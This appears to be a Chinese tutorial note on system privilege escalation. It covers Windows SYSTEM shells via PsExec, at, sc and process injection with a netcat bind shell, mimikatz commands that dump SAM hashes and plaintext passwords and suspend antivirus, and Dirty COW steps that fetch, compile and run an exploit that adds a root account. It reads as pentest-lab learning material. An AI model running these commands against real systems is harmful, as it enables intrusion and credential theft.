1. 技术文章
  2. 【知识整理】简单的系统提权

【知识整理】简单的系统提权

谁说胖子不能爱 提交于 2019-12-14 02:16:03

系统提权

文章目录

Windows与Linux系统的权限划分

在这里插入图片描述

本地提权

  • 系统账号之间权限隔离
    操作系统的安全基础
    用户空间
    内核空间

系统账号

  • 用户账号登录时候获取权限令牌
  • 服务账号无需用户登录已在后台启动服务

Window本地提权

使用Sysinternal suite中的Psexec

将下载好的sysinternal suite解压,找到Psexec,放入路径C:\WINDOWS\system32

在cmd的命令交互界面输入psexec在这里插入图片描述
输入命令 psexec -i -s cmd 即可打开 一个具有系统权限的交互界面在这里插入图片描述

设置时间任务

输入命令at 17:23/interactive cmd 即可在规定的时间打开 一个具有系统权限的交互界面[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZELg085E-1576240645371)(picture/image-20191208173421495.png)]

使用sc创建一个系统服务

在这里插入图片描述

sc create syscmd binpath="cmd/k start"type= own type= interact

sc start syscmd # 执行叫做syscmd的服务,服务名称可自定

注入进程提权***(隐蔽痕迹)

需要将Pinjector.exe放入路径C:\WINDOWS\system32中,然后在命令交互界面输入pinjector在这里插入图片描述

使用injector -l 可以查看系统中的服务、服务进程号、服务权限在这里插入图片描述

比如以services.exe为目标,其PID:968,注入到services中

则命令为injector -p 968 cmd 4444在这里插入图片描述

使用netcat连接到目标机在这里插入图片描述

优点:非常隐蔽

缺点:当对方重新启动服务后,就造成注入失效,需要重新注入

使用kali上的集成工具

关于windows的一些集成工具在kali的此目录下 /usr/share/windows-binaries在这里插入图片描述

其中的whoami是一个适用于32系统的程序

  • Fgdump

在这里插入图片描述

  • Mimikaatz
    kali中mimikatz存放路径,根据系统处理位选择
    mimikaatz存放路径
    发送到目标主机
    在这里插入图片描述
    点击即可运行
    在这里插入图片描述
    使用命令

    mimikatz.exe
::					# 查看命令模块和子模块
privilege::debug	# 提权到debug
lsadump::sam		#类似linux中的passwd文件,有用户密码
lsadump::secrets 	#查看隐私信息
sekurlsa::logonPasswords # 查看已登录账号密码信息(明文)
process::start calc #启动进程
service::start <service>  #启动服务


suspend <进程>		# 挂起进程,可暂停防病毒软件
resume  <进程>		# 恢复进程

    windows缓存密码:

    reg query HKEY_LOCAL_MACHINE\SECURITY\CACHE

脏牛提权

脏牛(Dirty Cow)是Linux内核的一个提权漏洞,攻击者可以利用这个漏洞获取root权限。之所以叫Dirty Cow,因为这个漏洞利用了Linux的copy-on-write机制。脏牛的CVE编号是CVE-2016-5195。

危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权

简要分析: 该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的。

以下是主流发行版修复之后的内核版本,如果内核版本低于列表里的版本,表示还存在脏牛漏洞

Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10      4.8.0-26.28
Ubuntu 16.04      4.4.0-45.66
Ubuntu 14.04      3.13.0-100.147
Debian 8          3.16.36-1+deb8u2
Debian 7           3.2.82-1

脏牛提权步骤

在测试机上使用 python -m SimpleHTTPServer 80开始web服务,将dirty.c的文件放在目录下,因为不同主机的编译结果不同,最好是在目标机上进行编译

  1. 目标机上使用wget下载到dirty.c的文件
wget 192.168.72.141/dirty.c ~/Desktop/

  1. 在目标机上,使用gcc对dirty.c的文件进行编译,得到dirty,并运行在这里插入图片描述

    gcc -pthread dirty.c -o dirty -lcrypt

dirty <password>

  2. dirty程序修改了/etc/passwd文件,生成了一个新的root账户,username:firefart;password:nbnb,切换后就拥有了管理员权限在这里插入图片描述

  3. 还原passwd中的用户信息

    在/tmp中多了个passwd.bak的文件,记录脏牛前的用户信息在这里插入图片描述

    使用命令还原passwd文件,以前的root用户恢复在这里插入图片描述

    mv /tmp/passwd.bak /etc/passwd

VMware共享文件

在VMware的虚拟机设置中,选项中开启,并添加物理机上需要与虚拟机共享共享的文件夹在这里插入图片描述

虚拟机中的共享文件路径

linux:/mnt/hgfs/

windows:\\vmware-host\Shared Folders

在这里插入图片描述

Sysinternals套件下载及说明:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/

脏牛代码:
https://github.com/FireFart/dirtycow

标签
psexec
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!